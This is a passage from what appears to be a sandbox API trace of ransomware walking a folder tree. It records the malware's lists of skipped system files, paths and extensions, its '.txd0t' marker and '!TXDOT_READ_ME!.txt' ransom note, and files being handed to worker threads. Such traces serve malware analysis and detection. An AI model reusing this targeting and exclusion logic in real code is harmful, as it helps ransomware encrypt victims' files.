(psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.996] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.996] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.996] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.996] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.996] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.996] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.997] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.997] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.997] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.997] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.997] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0085.997] GetProcessHeap () returned 0xe30000 [0085.997] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.997] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1045", cAlternateFileName="")) returned 1 [0085.997] StrCmpW (psz1="1045", psz2=".") returned 1 [0085.997] StrCmpW (psz1="1045", psz2="..") returned 1 [0085.997] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.997] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.997] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1045", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0085.997] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\system32\\") returned 0x0 [0085.997] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.997] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\system\\") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\appdata\\local\\") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\boot\\") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\perflogs\\") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\programdata\\") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\drivers\\") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\wsus\\") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="crypt_detect") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="cryptolocker") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="ransomware") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="C:\\WINDOWS") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.998] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1045", lpSrch="C:\\Program Files") returned 0x0 [0085.998] GetProcessHeap () returned 0xe30000 [0085.998] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.998] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0085.998] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\*") returned="C:\\588bce7c90097ed212\\1045\\*" [0085.998] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0085.998] StrCmpW (psz1=".", psz2=".") returned 0 [0085.999] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.999] StrCmpW (psz1="..", psz2=".") returned 1 [0085.999] StrCmpW (psz1="..", psz2="..") returned 0 [0085.999] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.999] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.999] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.999] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0085.999] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\") returned="C:\\588bce7c90097ed212\\1045\\" [0085.999] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\eula.rtf") returned="C:\\588bce7c90097ed212\\1045\\eula.rtf" [0085.999] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.999] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.999] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.999] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.999] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.999] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.999] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.999] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.999] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.999] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.999] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.999] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.999] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.999] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.999] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.999] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.999] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.999] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.999] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0086.099] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.099] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1045\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" [0086.099] SetEvent (hEvent=0x418) returned 1 [0086.099] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0086.099] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0086.099] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0086.099] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0086.099] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\") returned="C:\\588bce7c90097ed212\\1045\\" [0086.099] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" [0086.099] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.099] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0086.099] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0086.099] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0086.099] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0086.099] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0086.099] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0086.099] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0086.099] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0086.099] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0086.099] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0086.099] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0086.099] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0086.099] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0086.099] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0086.099] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.100] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.100] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0086.100] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0086.105] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.105] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" [0086.105] SetEvent (hEvent=0x3fc) returned 1 [0086.105] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0086.105] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0086.105] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0086.105] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1045", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045") returned="C:\\588bce7c90097ed212\\1045" [0086.105] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\") returned="C:\\588bce7c90097ed212\\1045\\" [0086.105] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1045\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" [0086.105] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.105] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0086.105] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0086.105] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0086.105] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0086.105] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0086.105] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0086.105] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0086.105] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0086.105] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0086.105] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0086.105] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0086.105] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0086.105] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0086.105] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0086.105] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.105] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.106] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.106] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0086.106] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0086.106] GetProcessHeap () returned 0xe30000 [0086.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0086.106] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1046", cAlternateFileName="")) returned 1 [0086.106] StrCmpW (psz1="1046", psz2=".") returned 1 [0086.106] StrCmpW (psz1="1046", psz2="..") returned 1 [0086.106] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.106] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.106] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1046", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\system32\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\syswow64\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\system\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\windows\\winsxs\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\appdata\\roaming\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\appdata\\local\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\appdata\\locallow\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\all users\\microsoft\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="\\inetpub\\logs\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\boot\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\perflogs\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\programdata\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\drivers\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\wsus\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\efstmpwp\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch=":\\$recycle.bin\\") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="crypt_detect") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="cryptolocker") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="ransomware") returned 0x0 [0086.106] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="C:\\WINDOWS") returned 0x0 [0086.107] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="C:\\Program Files (x86)") returned 0x0 [0086.107] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1046", lpSrch="C:\\Program Files") returned 0x0 [0086.107] GetProcessHeap () returned 0xe30000 [0086.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0086.107] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0086.107] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\*") returned="C:\\588bce7c90097ed212\\1046\\*" [0086.107] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2130 [0086.107] StrCmpW (psz1=".", psz2=".") returned 0 [0086.107] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.107] StrCmpW (psz1="..", psz2=".") returned 1 [0086.107] StrCmpW (psz1="..", psz2="..") returned 0 [0086.107] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0086.107] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0086.107] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0086.108] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0086.108] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\") returned="C:\\588bce7c90097ed212\\1046\\" [0086.108] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned="C:\\588bce7c90097ed212\\1046\\eula.rtf" [0086.108] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.108] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0086.108] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0086.108] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0086.108] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0086.108] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0086.108] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0086.108] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0086.108] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0086.108] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0086.108] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0086.108] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0086.108] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0086.108] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0086.108] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0086.108] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.108] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.108] StrStrIW 